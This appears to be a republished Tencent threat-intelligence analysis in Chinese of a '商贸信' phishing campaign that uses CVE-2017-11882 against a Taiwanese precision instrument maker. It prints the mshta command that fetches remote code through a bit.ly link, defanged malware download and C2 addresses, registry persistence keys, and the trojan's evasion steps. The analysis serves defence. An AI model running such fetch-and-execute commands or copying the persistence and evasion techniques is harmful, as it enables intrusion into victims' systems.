53

商贸信病毒针对某精密仪器公司的APT攻击

 5 years ago
source link: https://www.tuicool.com/articles/jUVJBfy
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

一、背景

近期腾讯安全御见威胁情报中监测到有黑客组织利用“商贸信”病毒针对外贸行业的APT攻击再次活跃。此轮攻击的特点为,利用2017年微软公布的office公式编辑器漏洞CVE-2017-11882构造钓鱼文档,文档触发漏洞后通过mshta.exe执行由短链接bit.ly构造的远程代码,从而将后门木马植入。

在某例攻击中,我们发现攻击者使用的钓鱼文档名称中包含台湾某精密仪器公司的全称,并且将文档成功发送至该公司的邮箱中。该文档触发漏洞执行后会下载后门木马smbn.exe,木马释放AutoIt脚本执行器,然后将高度混淆的AutoIt脚本代码传入脚本执行器执行,并安装为启动项反复执行,木马具有检测虚拟机,禁止任务管理器启动,关闭UAC,注入恶意代码到系统进程执行等功能。

1564648800_5d42a560eaec7.png!small

“商贸信”攻击流程图

二、详细分析

钓鱼邮件

1564648813_5d42a56d9feb0.png!small

1564648818_5d42a57229c79.png!small

被攻击台湾某公司为生成电脑数值控制(CNC),PCB成型机,PCB钻孔机等仪器,该公司与欧洲知名厂商合作生产,是一家全球化企业。

1564648829_5d42a57d78169.png!small

针对该公司攻击时的邮件附件名为:**精密股份限公司_3Q_pdf.doc,可见黑客已经在攻击前搜集了该公司的详细信息。打开文档发现包含一张图片,标题为“commercial invoice”,其含义为商业发票(SCcommercial invoice),是卖方开立的载有货物名称、数量、价格等内容的清单,作为买卖双方交接货物和结算货款的主要单证,是进口国确定征收进口关税的依据,也是买卖双方索赔、理赔的依据。

1564648853_5d42a595d342e.png!small

文档中包含精心构造的CVE-2017-11882漏洞触发代码,打开文档在未打补丁的电脑上会触发漏洞攻击执行命令mshta http[:]//bit.ly/2Y3jDhx &AAAAAAAAAAAAAAA

1564648962_5d42a602b87c9.png!small

http[:]//bit.ly/2Y3jDhx为短链接,访问时会跳转到地址http[:]//vilamax.home.pl/x/bn.hta,bn.hta继续下载和执行后门木马smbn.exe(http[:]//nextserv.pl/av/smbn.exe)

1564648979_5d42a6139e6cc.png!small

smbn.exe

smbn.exe为自解压程序,运行后释放55个文件到%Temp%/08761141/目录下。其中最关键的文件有三个:lfw.exe为AutoIt脚本执行器,xql=njc为第一层脚本,phm.ppt为被加密的最终脚本。(AutoIt是一个使用类似BASIC脚本语言的免费软件,它设计用于Windows GUI(图形用户界面)中进行自动化操作,它利用模拟键盘按键,鼠标移动和窗口/控件的组合来实现自动化任务。)

1564649028_5d42a64473397.png!small

解压时会通过命令行启动mvs.vbs,该脚本将 “xql=njc”文件作为参数传递给lfw.exe执行。

1564649039_5d42a64f6e64b.png!small

“xql=njc”文件被加入了大量杂质数据,因此有超过10M 大小,分析时发现里面包含真正执行的AutoIt脚本只有78行代码。

杂质中暗藏的AutoIt代码:

1564649048_5d42a6583a71d.png!small

提取出AutoIt代码只有78行:

1564649087_5d42a67f19922.png!small

分析“xql=njc”中的脚本代码,发现其功能为从phm.ppt中按照一定的特征如“S3tting”、“Dir3ctory”、“sK”、“sN”、“sData”、“esData”等定位加密数据,将加密数据解密成新的AutoIt代码后,保存至当前目录下的五位随机字符组成的文件名中,然后通过Run命令执行该脚本文件。

定位加密数据

1564649098_5d42a68a95d12.png!small

生成五位随机名字符文件,取ASCII编码65至90(对应大写字母A至Z)

1564649116_5d42a69c595d3.png!small

将解密后的代码写入文件(随机文件名)并通过Run命令启动执行

1564649138_5d42a6b24587e.png!small

核心脚本

解密出的随机名脚本文件共有754行代码,同样作为参数由脚本执行器lfw.exe执行,脚本实现虚拟机检测,安装启动项,解密PE数据,注入进程执行等核心功能,并且会在执行结束后被立即删除。

脚本文件位置

C:\DocumentsandSettings\[guid]\LocalSettings\Temp\08761141\SVDDG
C:\Users\[guid]\AppData\Local\Temp\08761141\KUEHL

再次从phm.ppt中读取加密数据

1564649152_5d42a6c0b94cb.png!small

写入注册表添加启动项

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce

1564649192_5d42a6e8b4370.png!small

关闭UAC

1564649199_5d42a6ef5eeca.png!small

检测虚拟机

将start.vbs添加到启动项,start.vbs执行start.cmd,start.cmd最后启动lfw.exe “xql=njc”

1564649210_5d42a6fa8db65.png!small

禁任务管理器进程启动

1564649216_5d42a7004d3b1.png!small

通过ShellExecute执行mshta.exe

1564649222_5d42a706ba757.png!small

执行run.vbs,该脚本同样用于启动lfw.exe “xql=njc”

1564649391_5d42a7af8719e.png!small

将数据还原为PE结构

1564649407_5d42a7bf41b9f.png!small

将恶意代码注入系统进程

1564649422_5d42a7ce587c0.png!small

连接C2地址smb3ans.pw

1564649446_5d42a7e6164d2.png!small

三、安全建议

1、不要打开不明来源的邮件附件,对于邮件附件中的文件要谨慎运行,如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描;
2、升级office系列软件到最新版本,不要随意运行不可信文档中的宏;
3、推荐部署腾讯御点终端安全管理系统防御病毒木马攻击;
4、使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。

1564649464_5d42a7f8c7c5a.png!small


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK